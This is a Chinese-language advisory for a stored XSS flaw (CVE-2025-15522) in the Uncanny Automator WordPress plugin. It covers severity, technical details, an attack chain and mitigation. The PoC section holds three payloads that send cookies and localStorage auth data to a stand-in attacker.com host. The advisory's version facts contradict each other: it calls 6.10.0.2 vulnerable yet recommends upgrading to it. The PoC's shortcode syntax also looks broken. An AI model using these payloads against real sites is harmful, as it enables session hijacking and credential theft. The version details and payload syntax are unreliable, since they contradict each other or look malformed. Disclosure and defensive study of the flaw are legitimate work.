CVE-2025-15522 WordPress Uncanny Automator插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-15522

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Uncanny Automator WordPress插件

漏洞概述

Uncanny Automator是一款流行的WordPress自动化、集成、Webhooks和工作流构建插件。该插件在6.10.0.2及以下所有版本中存在一个严重的存储型跨站脚本(XSS)漏洞。漏洞根源在于插件对automator_discord_user_mapping短代码中的verified_message参数缺乏充分的输入清理和输出转义处理。攻击者只需拥有WordPress Contributor级别或更高权限，即可利用此漏洞在受影响的页面中注入任意JavaScript代码。当具有已验证Discord账户的用户访问这些被注入恶意脚本的页面时，攻击者的代码将在用户浏览器中自动执行，可能导致会话劫持、敏感数据窃取、钓鱼攻击等严重安全后果。由于漏洞属于存储型XSS，恶意脚本会持久保存在数据库中，对所有访问该页面的用户造成持续威胁。

技术细节

该漏洞存在于Uncanny Automator插件的Discord集成模块中，具体位置在discord-user-mapping-shortcode.php文件的第128行附近。问题代码直接使用用户可控的verified_message参数而未经过适当的HTML转义处理。攻击者通过WordPress的短代码功能，构造包含恶意JavaScript代码的verified_message参数值，该值会被存储到数据库中。当其他用户访问包含该短代码的页面时，未经转义的脚本内容会被直接输出到HTML页面中执行。攻击利用条件包括：1)攻击者需拥有至少Contributor角色权限；2)目标页面需包含automator_discord_user_mapping短代码；3)访问者需拥有已验证的Discord账户。由于插件的权限要求相对较低，且Discord集成是该插件的常用功能，此漏洞在实际环境中具有较高的利用价值。攻击者可利用此漏洞窃取管理员cookie、修改页面内容或进行进一步权限提升。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标WordPress网站是否安装Uncanny Automator插件，并确定插件版本是否在6.10.0.2或以下

STEP 2

权限获取

攻击者获取WordPress Contributor级别或更高的用户账户权限，通常通过社会工程学、密码喷洒或利用其他漏洞实现

STEP 3

恶意载荷构造

攻击者构造包含恶意JavaScript代码的verified_message参数，利用短代码语法包装XSS载荷

STEP 4

漏洞注入

通过页面编辑或API调用，将包含恶意短代码的内容插入到WordPress页面或文章中，载荷被存储到数据库

STEP 5

触发执行

具有已验证Discord账户的受害者访问被注入的页面，服务器将未转义的用户输入返回给受害者浏览器

STEP 6

数据窃取

恶意JavaScript在受害者浏览器中执行，可窃取会话cookie、进行钓鱼攻击或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Shortcode XSS PoC for CVE-2025-15522 -->
<!-- Requires Contributor-level access or higher -->

[automator_discord_user_mapping]
verified_message="<script>alert('XSS - CVE-2025-15522');document.location='https://attacker.com/steal?cookie='+document.cookie</script>"
[/automator_discord_user_mapping]

<!-- Alternative PoC with img onerror -->
[automator_discord_user_mapping]
verified_message="<img src=x onerror='fetch(\"https://attacker.com/api/steal?data=\"+btoa(document.cookie))'/>"
[/automator_discord_user_mapping]

<!-- Steal admin credentials -->
[automator_discord_user_mapping]
verified_message="<script>fetch('https://attacker.com/log?c='+btoa(JSON.stringify({cookies:document.cookie,localStorage:localStorage.getItem('wp_auth')})));</script>"
[/automator_discord_user_mapping]

影响范围

Uncanny Automator插件 < 6.10.0.2

防御指南

临时缓解措施

立即将Uncanny Automator插件升级到最新版本(6.10.0.2或更高)。如果无法立即升级，可临时采取以下措施：1)禁用Discord集成功能；2)限制Contributor角色的内容发布权限；3)在Web应用层部署WAF规则过滤恶意脚本；4)审查所有包含automator_discord_user_mapping短代码的页面内容，移除可疑的verified_message参数。同时建议审查最近创建或修改的页面，确认是否存在恶意代码注入。